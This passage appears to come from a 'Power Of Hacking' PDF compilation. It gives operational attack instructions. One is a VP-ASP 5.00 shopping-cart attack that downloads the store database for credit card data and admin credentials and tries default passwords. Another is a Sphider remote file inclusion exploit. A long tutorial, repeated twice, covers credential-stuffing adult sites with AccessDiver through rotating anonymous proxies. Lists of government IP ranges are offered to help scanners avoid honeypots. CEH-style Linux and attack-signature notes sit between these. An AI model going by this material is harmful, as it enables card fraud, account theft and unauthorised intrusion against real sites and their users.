Power Of Hacking速 Type: VP-ASP Shopping Cart Version: 5.00 Dork = intitle:VP-ASP Shopping Cart 5.00 You will find many websites with VP-ASP 5.00 cart software installed Now let's get to the exploit.. the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp The exploit is : diag_dbtest.asp so do this: ****://***.victim.com/shop/diag_dbtest.asp A page will appear with something like: xDatabase shopping140 xDblocation resx xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:. the most important thing here is xDatabase xDatabase: shopping140 ok now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb if you didn't download the Database.. Try this while there is dblocation. xDblocation resx the url will be: ****://***.victim.com/shop/resx/shopping140.mdb If u see the error message you have to try this : ****://***.victim.com/shop/shopping500.mdb download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com inside you should be able to find credit card information. and you should even be able to find the admin username and password for the website. the admin login page is usually located here ****://***.victim.com/shop/shopadmin.asp if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are Mail:mtahirzahid@yahoo.com

Page 436


Power Of Hacking速 Username: admin password: admin OR Username: vpasp password: vpasp

16Sphider Version 1.2.x (include_dir) remote file inclusion # Sphider Version 1.2.x (include_dir) remote file inclusion # script Vendor: http://cs.ioc.ee/~ando/sphider/ # Discovered by: IbnuSina found on index.php $include_dir = "./include"; <--- no patch here $language_dir = "./languages"; include "$include_dir/index_header.inc"; include "$include_dir/conf.php"; include "$include_dir/connect.php"; exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu Finding A Spoofed Website With A Javascript

Lots of people think that Javascript is an inferior language but Javascript is an extremly powerful language and those people who think the other way they either don't know how to use it or are not familiar with it's capabilities, With javascript you can do lots of cool things such as edit any page, make an image fly etc, but it is a waste of time to spend your time on making images fly with javascripts or editing a page. Anyways coming to the main topic, did you know that javascript can be used to detect if a page is a spoofed website or phishing website or a legit one, well if you don't know just paste the following code in to the address bar and a pop up will appear telling you whether Mail:mtahirzahid@yahoo.com

Page 437


Power Of Hacking速 the website is original or not Here is the Javascript code: javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof."); free Website & forum making sites (Website free making sites) 1) www.ucoz.com 2) www.webs.com 3) www.weebly.com 4) www.wetpaint.com 5) www..com 6) www.freewebsites.com 7) www.jimdo.com 8) www.freewebspace.com 9) www.110mb.com 10) www.sitesled.com 11) www.webnode.com (Forum making free sites) 1) www.forumotion.com 2) www.freeforum.com 3) www.lefora.com 4) www.makeforum.org 5) www.forumer.com 6) www.freeforum.ca 7) www.nabble.com PRACTICE Question:-

Mail:mtahirzahid@yahoo.com

Page 438


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 439


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 440


Power Of Hacking速 Linux Operating System While it is not necessary to be a Linux administrator or developer to pass this test, there is some assumed knowledge of a few basics, particularly pertaining to Security issues. Linux File System / Root of the file system /var Variable data, log files are found here /bin Binaries, commands for users /sbin System Binaries, commands for administration /root Home directory for the root user /home Directory for all home folders for non-privileged users /boot Stores the Linux Kernel image and other boot files /proc Direct access to the Linux kernel /dev direct access to hardware storage devices /mnt place to mount devices on onto user mode file system Identifying Users and Processes INIT process ID 1 Root UID, GID 0 Accounts for services 1-999 All other users Above 1000 MAC Times Modify Modify the contents of the file Access When the files was accessed last Change Metadata change Use the "touch -mac filename" command to update all of them at the same time Permissions User Group Others R 400 040 004 W 200 020 002 X 100 010 001 SUID 4000 SGID 2000 Examples User can RWX, Group can RW and Others can R 764 User can RW, Group can R and others can R 644 SUID bit set, User and group can RWX 4770 SUID and GUID bit set, all users can RWX 6777 Mail:mtahirzahid@yahoo.com

Page 441


Power Of Hacking速 Linux Commands Practice the following commands and be able to recognize them in a shell script or log file. Always remember to "manpage" a command. Get used to reading about options and usage. Command Notable Options Description Using Linux (Basic Commands) man / Manual pages ls -l Looksee into a directory cd Change directory pwd Print working directory touch -macr Create a file or update its attributes mv Move a file rm Remove a file mkdir Make a directory grep String search utility more Paginate the output to the console nano Simple text editor vi Powerful text editor gcc -o Compile from source code Administration and Troubleshooting dd Create an image file of a volume or device file Query a file for its type netstat List state of TCP/UDP ports dig DNS Zone transfer host Look up DNS records lsof List open files ps aux View process list rpcinfo Enumerate portmapper smbclient -L List or use SMB shares md5sum Calculate MD5 hash Security tools that run best under Linux (add your own to this list !) mailsnarf, urlsnarf, filesnarf ettercap -q -z MiTM sniffer nmap Network mapper hping -c count -S Packet crafter snort Network Intrusion Detection iptables -P -A -j --sport --dport -p Kernel mode firewall Mail:mtahirzahid@yahoo.com

Page 442


Power Of Hacking® kismet WiFi scanner and sniffer nikto Web vulnerability scanner maltego Information gathering tcpdump -i Command line sniffer firewalk -u Firewall enumerator nc -l -e -v "Swiss army knife" Command Line Tools The key to becoming comfortable with command line tools is to practice saying in plain language what a command is trying to instruct the computerto do. Its hard to memorize switches and far easier to understand what a tool does. As you study and find more examples, add them to this list. NMap nmap -sT -T5 -n -p 1-100 192.168.1.1 Use nmap to run a connect scan at a fast rate without DNS resolution to ports 1-100 at host 192.168.1.1 Netcat nc -v -z -w 2 192.168.1.1 Use netcat, show on the console a scan that sends packets every 2 seconds to host 192.168.1.1 tcpdump tcpdump -i eth0 -v -X ip proto 1 Use tcpdump to listen on interface eth0 andsdisplay layer 2 and 7 for ICMP traffic snort snort -vde -c my.rules -l . Use snort and show on the console layer 2 and 7 data using configuration file my.rules and log in this directory. hping hping3 -I eth0 -c 10 -a 2.2.2.2 -t 100 192.168.3.6 Use hping3 on eth0 and send 10 packets spoofing 2.2.2.2 and a TTL of 100 to host 192.168.3.6 iptables iptables –A FORWARD –j ACCEPT –p tcp --dport 80 Use iptables and append the forward table with a rule that will jump to the accept table when tcp traffic that has a destination port of 80 is noticed. Syntax Recognition The CEH exam rewuires that you can recognize what an attack looks like from a log file. The following are examples that can be used to help explain the principles of each type of attack: Mail:mtahirzahid@yahoo.com

Page 443


Power Of Hacking® Directory Traversal http://www.example.com/scripts/../../../../winnt/system32/cmd.exe?c+dir+c: XSS (Cross Site Scripting) http://www.example.com/pages/form.asp?foo=%3Cscript%3Ealert("Hacked")%3C/script%3 El ang= SQL Injection http://www.example.com/pages/form.asp?foo=blah'+or+1+=+1+-http://www.example.com/pages/form.asp?foo=%27%3B+insert+into+usertable+("something " )%3B+--lang= blah' or 1 = 1 -Nimda Virus http://www.example.com/MSADC/../../../../winnt/system32/cmd.exe?c+dir+c: Code Red GET/default.ida?NNNNNNNNNNN%u9090%u688%u8b00%u0000%u00=a HTTP/1.0 SNMP OID 1.1.1.0.2.3.1.2.4.1.5.3.0.1 Buffer overflow attempt Apr 5 02:02:09 [3432] : nops: 62.32.54.123:3211 -> 192.168.3.4:135 0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/ Zone Transfer Apr 5 02:02:09 [3432] : AXFR: 143.32.4.129:4865 -> 192.168.3.4:53 Enumerate email accounts Apr 5 02:02:09 [3432] : VRFY: 78.34.65.45:5674 -> 192.168.3.4:25 Snort Signature Rule Alert tcp any any -> any any (msg:"Test Rule"; sid:1000000;) IPTables Rule iptables –A FORWARD –j ACCEPT –p udp –-dport 53 Capture Filter host 192.168.1.1 and host 192.168.1.2 ip proto 1 Display Filter ip.addr == 192.168.1.1 && tcp.flags == 0x29 Hi all you scanners, You might have seen this list before. Do not scan them or you will be in Sh*t. Some of these people will actually chase up sock proxys and all that to get you IP address Mail:mtahirzahid@yahoo.com

Page 444


Power Of Hacking速

6.*.*.* - Army Information Systems Center 21.*.*.* - US Defense Information Systems Agency 22.*.*.* - Defense Information Systems Agency 26.*.*.* - Defense Information Systems Agency 29.*.*.* - Defense Information Systems Agency 30.*.*.* - Defense Information Systems Agency 49.*.*.* - Joint Tactical Command 50.*.*.* - Joint Tactical Command 53.*.*.* DaimlerChrysler AG 55.*.*.* - Army National Guard Bureau

62.0.0.1 - 62.30.255.255 64.224.*.* 64.225.*.* 64.226.*.* 128.47.0.0 Army Communications Electronics Command (NET-TACTNET) 128.50.0.0 Department of Defense (NET-COINS) 128.51.0.0 Department of Defense (NET-COINSTNET) 128.56.0.0 U.S. Naval Academy (NET-USNA-NET) 128.63.0.0 Army Ballistics Research Laboratory (NET-BRL-SUBNET) 128.80.0.0 Army Communications Electronics Command (CECOM) (NET-CECOMNET) 128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency (NET-DERA-UK) 128.154.0.0 NASA Wallops Flight Facility (NET-WFF-NET) 128.155.0.0 NASA Langley Research Center (NET-LARC-NET) 128.156.0.0 NASA Lewis Network Control Center (NET- LERC)

128.157.0.0 NASA Johnson Space Center (NET-JSC-NET) 128.158.0.0 NASA Ames Research Center (NET-MSFC-NET) 128.159.0.0 NASA Ames Research Center (NET-KSC-NET) 128.160.0.0 Naval Research Laboratory (NET- SSCNET) 128.161.0.0 NASA Ames Research Center (NET-NSN-NET) 128.183.0.0 NASA Goddard Space Flight Center (NET-GSFC) 128.216.0.0 MacDill Air Force Base (NET-CC-PRNET) Mail:mtahirzahid@yahoo.com

Page 445


Power Of Hacking速 128.217.0.0 NASA Kennedy Space Center (NET-NASA-KSC-OIS) 128.236.0.0 U.S. Air Force Academy (NET-USAFA-NET) 139.142.* 155.7.0.0 American Forces Information (NET-AFISHQ-NET1) 155.8.0.0 U.S. ArmyFort Gordon (NET-GORDON-NET5) 155.9.0.0 United States Army Information Systems Command (NET-LWOOD-NET2) 155.74.0.0 PEO STAMIS (NET-CEAP2) 155.75.0.0 US Army Corps of Engineers (NET-CEAP3)

155.76.0.0 PEO STAMIS (NET-CEAP4) 155.77.0.0 PEO STAMIS (NET-CEAP5) 155.78.0.0 PEO STAMIS (NET-CEAP6) 155.79.0.0 US Army Corps of Engineers (NET-CEAP7) 155.80.0.0 PEO STAMIS (NET-CEAP 155.81.0.0 PEO STAMIS (NET-CEAP9) 155.82.0.0 PEO STAMIS (NET-CEAP10) 155.83.0.0 US Army Corps of Enginers (NET-CEAP11) 155.84.0.0 PEO STAMIS (NET-CEAP12) 155.85.0.0 PEO STAMIS (NET-CEAP13) 155.86.0.0 US Army Corps of Engineers (NET-CEAP14) 155.87.0.0 PEO STAMIS (NET-CEAP15)

155.88.0.0 PEO STAMIS (NET-CEAP16) 155.178.0.0 Federal Aviation Administration (NET-FAA) 155.213.0.0 USAISC Fort Benning (NET-FTBENNNET3 155.214.0.0 Director of Information Management (NET-CARSON-TCACC ) 155.215.0.0 USAISC-FT DRUM (NET-DRUM-TCACCIS) 155.216.0.0 TCACCIS Project Management Office (NET-FTDIX-TCACCI) 155.217.0.0 Directorate of Information Management (NET- EUSTIS-EMH1) 155.218.0.0 USAISC (NET-WVA-EMH2) 155.219.0.0 DOIM/USAISC Fort Sill (NET-SILL-TCACCIS) 155.220.0.0 USAISC-DOIM (NET-FTKNOX-NET4) 155.221.0.0 USAISC-Ft Ord (NET-FTORD-NET2) 195.10.* 205.96.* - 205.103.* Mail:mtahirzahid@yahoo.com

Page 446


Power Of Hacking速

207.30.* - 207.120.* 207.60.* - 207.61.* - FBI Linux server used to trap scanners 209.35.* 216.25.* <-- REAL DANGEROUS 216.247.* <-- REAL DANGEROUS 217.6.*.* 204.34.0.0 - 204.34.15.0 IPC JAPAN (NETBLK-YOKONET) 204.34.0.0 - 204.37.255.0 DOD Network Information Center (NIC-N-NIC7) 204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery (NETBLK-GREATLAKES) 204.34.32.0 - 204.34.63.0 USACOM (NETBLK-JWID-1) 204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE (NETBLK-NETBLK-DFAS-OPLOC) 204.34.128.0 DISA-Eucom / BBN-STD, Inc. (NET-REGGAE-12

204.34.129.0 Defense Technical Information Center (NET-UNISYS-DTIC) 204.34.130.0 GSI (NET-SNIC) 204.34.131.0 NSA NAPLES ITALY (NET-LEVEL2-NAPLES) 204.34.132.0 NAVSTA ROTA SPAIN (NET-LEVEL2-ROTA) 204.34.133.0 NAS SIGONELLA ITALY (NET-LEVEL2-SIG) 204.34.134.0 Naval Air Warfare Center Aircraft Division (NET-JCTE-JCS) 204.34.135.0 GSI (NET-SNIC1) 204.34.136.0 Naval Undersea Warfare Center USRD - Orlando (NET-UWCUSRD-ORL) 204.34.137.0 Joint Spectrum Center (JSC) (NET-JFMO-JAPAN) 6.*.*.* : Army Information Systems Center 21.*.*.* : US Defense Information Systems Agency 6.*.*.* : Army Information Systems Center 21.*.*.* : US Defense Information Systems Agency 22.*.*.* : Defense Information Systems Agency 26.*.*.* : Defense Information Systems Agency 29.*.*.* : Defense Information Systems Agency 30.*.*.* : Defense Information Systems Agency 49.*.*.* : Joint Tactical Command 50.*.*.* : Joint Tactical Command 55.*.*.* : Army National Guard Bureau Mail:mtahirzahid@yahoo.com

Page 447


Power Of Hacking速 22.*.*.* : Defense Information Systems Agency 26.*.*.* : Defense Information Systems Agency 29.*.*.* : Defense Information Systems Agency 30.*.*.* : Defense Information Systems Agency 49.*.*.* : Joint Tactical Command 50.*.*.* : Joint Tactical Command 55.*.*.* : Army National Guard Bureau 62.0-30.*.* : 64.224.*.* : 64.225.*.* : 64.226.*.* : 155.7.*.* : American Forces Information (NET-AFISHQ-NET1) 155.8.*.* : U.S. ArmyFort Gordon (NET-GORDON-NET5) 155.9.*.* : United States Army Information Systems Command (NET-LWOOD-NET2) 155.74.*.* : PEO STAMIS (NET-CEAP2) 155.75.*.* : US Army Corps of Engineers (NET-CEAP3) 155.76.*.* : PEO STAMIS (NET-CEAP4) 155.77.*.* : PEO STAMIS (NET-CEAP5) 155.78.*.* : PEO STAMIS (NET-CEAP6) 155.79.*.* : US Army Corps of Engineers (NET-CEAP7) 155.80.*.* : PEO STAMIS (NET-CEAP 155.81.*.* : PEO STAMIS (NET-CEAP9) 155.82.*.* : PEO STAMIS (NET-CEAP10) 155.83.*.* : US Army Corps of Enginers (NET-CEAP11) 155.84.*.* : PEO STAMIS (NET-CEAP12) 155.85.*.* : PEO STAMIS (NET-CEAP13) 155.86.*.* : US Army Corps of Engineers (NET-CEAP14) 155.87.*.* : PEO STAMIS (NET-CEAP15) 155.88.*.* : PEO STAMIS (NET-CEAP16) 155.178.*.* : Federal Aviation Administration (NET-FAA) 155.213.*.* : USAISC Fort Benning (NET-FTBENNNET3 155.214.*.* : Director of Information Management (NET-CARSON-TCACC ) 155.215.*.* : USAISC-FT DRUM (NET-DRUM-TCACCIS) 155.216.*.* : TCACCIS Project Management Office (NET-FTDIX-TCACCI) 155.217.*.* : Directorate of Information Management (NET- EUSTIS-EMH1) 155.218.*.* : USAISC (NET-WVA-EMH2) 155.219.*.* : DOIM/USAISC Fort Sill (NET-SILL-TCACCIS) Mail:mtahirzahid@yahoo.com

Page 448


Power Of Hacking速 155.220.*.* : USAISC-DOIM (NET-FTKNOX-NET4) 155.221.*.* : USAISC-Ft Ord (NET-FTORD-NET2) 128.47.*.* : Army Communications Electronics Command (NET-TACTNET) 128.50.*.* : Department of Defense (NET-COINS) 128.51.*.* : Department of Defense (NET-COINSTNET) 128.56.*.* : U.S. Naval Academy (NET-USNA-NET) 128.63.*.* : Army Ballistics Research Laboratory (NET-BRL-SUBNET) 128.80.*.* : Army Communications Electronics Command (CECOM) (NET-CECOMNET) 128.98.*.* : Defence Evaluation and Research Agency (NET-DERA-UK) 128.154.*.* : NASA Wallops Flight Facility (NET-WFF-NET) 128.155.*.* : NASA Langley Research Center (NET-LARC-NET) 128.156.*.* : NASA Lewis Network Control Center (NET- LERC) 128.157.*.* : NASA Johnson Space Center (NET-JSC-NET) 128.158.*.* : NASA Ames Research Center (NET-MSFC-NET) 128.159.*.* : NASA Ames Research Center (NET-KSC-NET) 128.160.*.* : Naval Research Laboratory (NET- SSCNET) 128.161.*.* : NASA Ames Research Center (NET-NSN-NET) 128.183.*.* : NASA Goddard Space Flight Center (NET-GSFC) 128.216.*.* : MacDill Air Force Base (NET-CC-PRNET) 128.217.*.* : NASA Kennedy Space Center (NET-NASA-KSC-OIS) 128.236.*.* : U.S. Air Force Academy (NET-USAFA-NET 139.142.*.* : 139.142.153.23 : Front end portal of a security network filtering hundreds of client subscription IPs. If you find a vulnerable pub, IIS, SQL, or *nix -- LEAVE IT ALONE 195.10.* : (FBI's honeypot) 205.96-103.* : (FBI's honeypot) 207.30-120.* : (FBI's honeypot) 207.60-61.*.* : FBI Linux servers used to trap scanners 209.35.* : (FBI's honeypot) 212.159.40.211 : (FBI's honeypot) 212.159.41.173 : (FBI's honeypot) 212.159.0.2 : (FBI's honeypot) 212.159.1.1 : (FBI's honeypot) 212.159.1.4 : (FBI's honeypot) 212.159.1.5 : (FBI's honeypot) 212.56.107.22 : (FBI's honeypot) 212.159.0.2 : (FBI's honeypot) 212.159.33.56 : (FBI's honeypot) Mail:mtahirzahid@yahoo.com

Page 449


Power Of Hacking速 212.56.107.22 : (FBI's honeypot) 216.25.* : (FBI's honeypot) 216.247.* : (FBI's honeypot) 216.25.* : REAL DANGEROUS 216.247.* : REAL DANGEROUS 217.6.*.* : FBI's honeypot HoneyNet Project http://project.honeynet.org/ Know your Ennemy : HoneyNets http://project.honeynet.org/papers/honeynet/ SANS IDS FAQ : What is Honeypot ? http://www.sans.org/newlook/resources/IDFAQ/honeypot3.htm Honey Pots and Intrusion Detection http://www.sans.org/infosecFAQ/intrusion/honeypots.htm The Deception Toolkit http://www.all.net/dtk/index.html An Explanation of Computer Forensic http://www.computerforensics.net/forensics.htm Computer Forensics – An Overview http://www.sans.org/infosecFAQ/incident/forensics.htm The Forensic Challenge http://project.honeynet.org/challenge/ Forensic Computer Analysis - An Introduction http://www.ddj.com/articles/2000/0009/0009f/0009f.htm The Coroner Toolkit http://www.fish.com/tct/ WARNING: Replicon's security team is working close with federal/state and corporate law enforcement. They will let you scan, tag, fill, or overtake the entire system. But you really have no control. They are monitoring you, accepting your every move while they profile you. Your dumbass is on Candid Camera. (The *nix box that you 'overtake' is actually a guided security emulator that runs on NT...) Let 'em record you ploppin' the newest, unrealeased version of Photoshop, Windows, Lightwave. Max, Maya, Cosmo, or others and you (as well as everyone else involved in the operation - from Scanner to Downloader) will be 'profiled' for a very unhappy future... Cracking Adult Porn Sites Whackin it for free - or - How to crack Adult Porm sites. Mail:mtahirzahid@yahoo.com

Page 450


Power Of Hacking速

Disclaimer This is an insight into how I do it. It's not the only way and it's probably not the best way but its my way and it works. If it works for you - share the knowledge with those who want to learn and share the fruits of your efforts with those who want to wank! Part 1 - How is it possible? 1) Humans love porm 2) Humans are lazy How does this help us find a login for your favourite left handed web site? well..... 1) above tells us that if we take a normal red blooded male (with more money than internet sense and a permanent hard on) who is prepared to shell out some of his hard earned cash on a subscription to [url]www.stickitupmypussy.com[/url] then there is a very good chance he will also be prepared to shell out a little more on subscriptions to [url]www.stickitupmyass.com[/url] or even [url]www.fuckmyarmpit.com[/url] too (for when he feels like a change - in fact he may well be a fully paid up member of 5 or 6 adult pay sites. 2) above tells us that he does not want to have to remember 5 or 6 different login:pass combinations because it makes his brain hurt, so he will probably use the same login:pass for all of his subscriptions. So, for instance, if some person with a little more computer savvy than the administrator of one of the porn sites happens to break into that porn site's server and finds the password file then as well as liberating lots of valid login:pass combos for that site, there is a very good chance those combos will be valid for several other sites as yet unknown. 2)above also tells us that he will probably choose a login:pass combo that is easy for him to remember - and for that read easy for anyone to guess. So there is a fairly good chance that the imaginative Login=dave Pass=dave or Login=qwerty Pass=asdfgh will be valid combos for an extraordinarily large number of sites. Mail:mtahirzahid@yahoo.com

Page 451


Power Of Hacking速

So bearing all this in mind, to start your journey into the wonderful world of cracking all you need is a fair sized list of these combos and a program that automates the process of entering them into the site login:pass box........or is it. There is one more very important ingredient you will need. Lots of adult sites will detect that a single person (ie you) is trying lots of different combos to try to gain access and will react by not allowing access from your ip address even with a valid login. They may go further and report this dubious behaviour to your isp and may even report this attempted theft of their electronic property to the police. No 5 minute wank is worth losing your account with your isp and possibly a large fine or worse! To get round these possible spanners in the works you will need an anonymous proxy (or realistically as big a list of anonymous proxies that you can find) Part 2 - Where do I get these 3 essentials? 1) A brute force program - There are several good programs available to automate the task of inputting lists of login combos into a pay site via an anonymous proxy. I use Accessdiver ([url]www.accessdiver.com[/url]) but there are others such as goldeneye, ares and hackttp. Accessdiver has many extras which make it my choice such as a facility to find and check anonymous proxies and a tool for making combo lists 2) A combo list - A good list is what seperates the adequates from the greats. I make wordlists by doing the following: Leech passes from password sites such as [url]www.ultrapasswords.com,[/url] Turn on channel loggig in your irc client and leech passes from the logs (Crackers frequently post whole lists of passes in the channel) remember it doesn't matter if the logins no longer work for the sites they are posted for - they may well work for sites they haven't been tried on yet.

3) A list of working anonymous proxies - there are sites on the web with lists of proxies - try looking on [url]www.neworder.box.sk[/url] or packetstormsecurity.org for proxy sites- Cracking sites will frequently have Mail:mtahirzahid@yahoo.com

Page 452


Power Of Hacking速 a proxies page also. Proxylists can also be found on irc - try asking channel ops if there is an automatic dcc trigger for an up to date proxylist. Part 3 - How do I use accessdiver to... 1) Get a decent wordlist. Fire up AD (Current version is 4.76) and go to My Skill on menu bar - set it to "expert" and never set it to anything else. Go to dictionary|web word leecher To leech websites -In the box marked zone type in the EXACT url of the page containing the passes you wish to leech eg [url]http://www.ultrapasswords.com/index.html[/url] and press the + button. Repeat this for as many pages you wish. To leech passlists or irc logs - press the "extract logins from a file" button on the left and browse to your file eg c:\mirc\logs\#hackedxxxpasses.log and press open. Repeat for all local files you wish to leech. Now press the "start leeching" button. A list of combos will appear in the right hand pane. Go to wordlist on the menu bar and remove duplicates then press the "save to disk" button to save and the "add in wordlists" to start using them straight away. You now have your first wordlist. 2) Find anonymous proxies In AD go to proxy|web proxy leecher To leech websites - In the url box type in the exact url of the page containing the proxies eg [url]http://www.proxy.com/index.html[/url] and press the + button. Repeat this for as many pages as you wish. To leech proxylists - press the "add a file to the list which contains proxies" button on the left and browse to your proxy list eg c:\mirc\downloads\proxylist.txt and press open. Repeat for all local files you wish to leech. Now press the "start leeching" button. A list of proxies will appear in the right hand pane. Press the "add these proxies in" button and select the proxy analyzer. Mail:mtahirzahid@yahoo.com

Page 453


Power Of Hacking速 go to the proxy analyzer tab, set your timeout to 15 seconds(small box at the bottom of the screen) then press the speed/accuracy tester. After this check you will see all the proxies which are no longer valid. press the button with the brush on it and select "delete bad results and timed out" Don't be surprised if loads of your proxies are deleted at this stage - proxies die quickly. Next select all remaining proxies and press the "confidentiality tester" button. Anonymous proxies are ranked from 1 (best) to 5 (worst) delete all proxies that don't have a ranking. select the rest (or choose the fastest ones if you have lots) and press the "add proxy" button to save your selection as the active list. Part 4 - Ok so I've got everything I need, how do I Crack a website? So you have Accessdiver up and running with your newly made wordlist and your freshly checked proxylist, how do you turn that into a members only wankfest? Well, you're almost there. Visit the site you want to crack and find the members login url - thats the link that throws up the login and pass box eg [url]http://members.privategold.com/restricted.[/url] Paste that url into the "server" box at the top of the screen. Go to the settings tab and check the "let a bot retry on abnormal replies" and "always force a security test" boxes. Make sure temporisation is unchecked. Redirections mean nothing special! Go to proxy tab and check "use web proxies" Check change proxy on redirections, fake replies and errors. Set the bots slider at the top of the screen to about 50 and press standard. You should see a "progress" box with a whole column of "401-unauthorised" replies. If so everything is going according to plan and with a bit of luck you might see a cracked login appear below the progress column. Congratulations, you just cracked your first site!! Part 5 - What should I look for while the test is running? Keep an eye on the progress page! -If you want you can gradually increase the number of bots; on a 56k dialup with no other online activity you should Mail:mtahirzahid@yahoo.com

Page 454


Power Of Hacking速 be able to run around 75-80 bots. Too many bots will cause a sharp increase in 404 errors. If you see the 404s increasing, decrease the bots. A large number of 403 errors means the site is going to be a bit of a challenge and will probably need a lot of proxies to crack it. You can maximise the life of each proxy by checking the "rotate proxies" box on the proxy tab. The number of logins before rotating will vary from site to site and its a matter of trial and error, experience and advice to get it right. If the test seems to be going extremely slowly - give up and try another site. Some sites just weren't made to be cracked by beginners! Part 6 - Anything else I should know? This is a very basic introduction to cracking adult sites. You can't have your hand held forever so if you want to get better at it you need to put some effort into it. Play around with the program. Experiment with different functions but specifically become familiar with the exploiter facility - it can sometimes deliver golden eggs! On the web word leecher, go to the urls found tab and check the box marked extract urls during the process. Save the cracked sites found in your history. Learn how to "refresh the login status" of the sites in your history. Download a copy of Raptor and use it to compile wordlists and site lists. Keep updating your main wordlist but keep your old ones too! Some sites are not crackable using this method - the ones that do not allow the member to choose his own login or pass . iBill frequently - but not always - use this method. don't waste your time on these sites. If you enjoy cracking and you get comfortable with it - get a request manager and start doing some cracking for the group - if you are any good you'll be noticed and probably get AOPed with all the financial security and sex on tap that brings. thanks to [/B][/QUOTE] QuickQuote Whackin it for free - or - How to crack Adult Porn sites. Mail:mtahirzahid@yahoo.com

Page 455


Power Of Hacking速

Disclaimer This is an insight into how I do it. It's not the only way and it's probably not the best way but its my way and it works. If it works for you - share the knowledge with those who want to learn and share the fruits of your efforts with those who want to wank! Part 1 - How is it possible? 1) Humans love porm 2) Humans are lazy How does this help us find a login for your favourite left handed web site? well..... 1) above tells us that if we take a normal red blooded male (with more money than internet sense and a permanent hard on) who is prepared to shell out some of his hard earned cash on a subscription to www.stickitupmypssy.com then there is a very good chance he will also be prepared to shell out a little more on subscriptions to www.stickitupmyass.com or even www.fckmyarmpit.com too (for when he feels like a change - in fact he may well be a fully paid up member of 5 or 6 adult pay sites. 2) above tells us that he does not want to have to remember 5 or 6 different login:pass combinations because it makes his brain hurt, so he will probably use the same login:pass for all of his subscriptions. So, for instance, if some person with a little more computer savvy than the administrator of one of the porn sites happens to break into that porn site's server and finds the password file then as well as liberating lots of valid login:pass combos for that site, there is a very good chance those combos will be valid for several other sites as yet unknown. 2)above also tells us that he will probably choose a login:pass combo that is easy for him to remember - and for that read easy for anyone to guess. So there is a fairly good chance that the imaginative Login=dave Pass=dave or Login=qwerty Pass=asdfgh will be valid combos for an extraordinarily large number of sites. Mail:mtahirzahid@yahoo.com

Page 456


Power Of Hacking速

So bearing all this in mind, to start your journey into the wonderful world of cracking all you need is a fair sized list of these combos and a program that automates the process of entering them into the site login:pass box........or is it. There is one more very important ingredient you will need. Lots of adult sites will detect that a single person (ie you) is trying lots of different combos to try to gain access and will react by not allowing access from your ip address even with a valid login. They may go further and report this dubious behaviour to your isp and may even report this attempted theft of their electronic property to the police. No 5 minute wank is worth losing your account with your isp and possibly a large fine or worse! To get round these possible spanners in the works you will need an anonymous proxy (or realistically as big a list of anonymous proxies that you can find) Part 2 - Where do I get these 3 essentials? 1) A brute force program - There are several good programs available to automate the task of inputting lists of login combos into a pay site via an anonymous proxy. I use Accessdiver (www.accessdiver.com) but there are others such as goldeneye, ares and hackttp. Accessdiver has many extras which make it my choice such as a facility to find and check anonymous proxies and a tool for making combo lists 2) A combo list - A good list is what seperates the adequates from the greats. I make wordlists by doing the following: Leech passes from password sites such as www.ultrapasswords.com, Turn on channel loggig in your irc client and leech passes from the logs (Crackers frequently post whole lists of passes in the channel) remember it doesn't matter if the logins no longer work for the sites they are posted for - they may well work for sites they haven't been tried on yet.

3) A list of working anonymous proxies - there are sites on the web with lists of proxies - try looking on www.neworder.box.sk or packetstormsecurity.org for proxy sites- Cracking sites will frequently have Mail:mtahirzahid@yahoo.com

Page 457


Power Of Hacking速 a proxies page also. Proxylists can also be found on irc - try asking channel ops if there is an automatic dcc trigger for an up to date proxylist. Part 3 - How do I use accessdiver to... 1) Get a decent wordlist. Fire up AD (Current version is 4.76) and go to My Skill on menu bar - set it to "expert" and never set it to anything else. Go to dictionary|web word leecher To leech websites -In the box marked zone type in the EXACT url of the page containing the passes you wish to leech eg http://www.ultrapasswords.com/index.html and press the + button. Repeat this for as many pages you wish. To leech passlists or irc logs - press the "extract logins from a file" button on the left and browse to your file eg c:\mirc\logs\#hackedxxxpasses.log and press open. Repeat for all local files you wish to leech. Now press the "start leeching" button. A list of combos will appear in the right hand pane. Go to wordlist on the menu bar and remove duplicates then press the "save to disk" button to save and the "add in wordlists" to start using them straight away. You now have

your first wordlist. 2) Find anonymous proxies In AD go to proxy|web proxy leecher To leech websites - In the url box type in the exact url of the page containing the proxies eg http://www.proxy.com/index.html and press the + button. Repeat this for as many pages as you wish. Mail:mtahirzahid@yahoo.com

Page 458


Power Of Hacking速 To leech proxylists - press the "add a file to the list which contains proxies" button on the left and browse to your proxy list eg c:\mirc\downloads\proxylist.txt and press open. Repeat for all local files you wish to leech. Now press the "start leeching" button. A list of proxies will appear in the right hand pane. Press the "add these proxies in" button and select the proxy analyzer. go to the proxy analyzer tab, set your timeout to 15 seconds(small box at the bottom of the screen) then press the speed/accuracy tester. After this check you will see all the proxies which are no longer valid. press the button with the brush on it and select "delete bad results and timed out" Don't be surprised if loads of your proxies are deleted at this stage - proxies die quickly. Next select all remaining proxies and press the "confidentiality tester" button. Anonymous proxies are ranked from 1 (best) to 5 (worst) delete all proxies that don't have a ranking. select the rest (or choose the fastest ones if you have lots) and press the "add proxy" button to save your selection as the active list. Part 4 - Ok so I've got everything I need, how do I Crack a website? So you have Accessdiver up and running with your newly made wordlist and your freshly checked proxylist, how do you turn that into a members only wankfest? Well, you're almost there. Visit the site you want to crack and find the members login url - thats the link that throws up the login and pass box eg http://members.privategold.com/restricted. Paste that url into the "server" box at the top of the screen. Go to the settings tab and check the "let a bot retry on abnormal replies" and "always force a security test" boxes. Make sure temporisation is unchecked. Redirections mean nothing special! Go to proxy tab and check "use web proxies" Check change proxy on redirections, fake replies and errors. Set the bots slider at the top of the screen to about 50 and press standard. You should see a 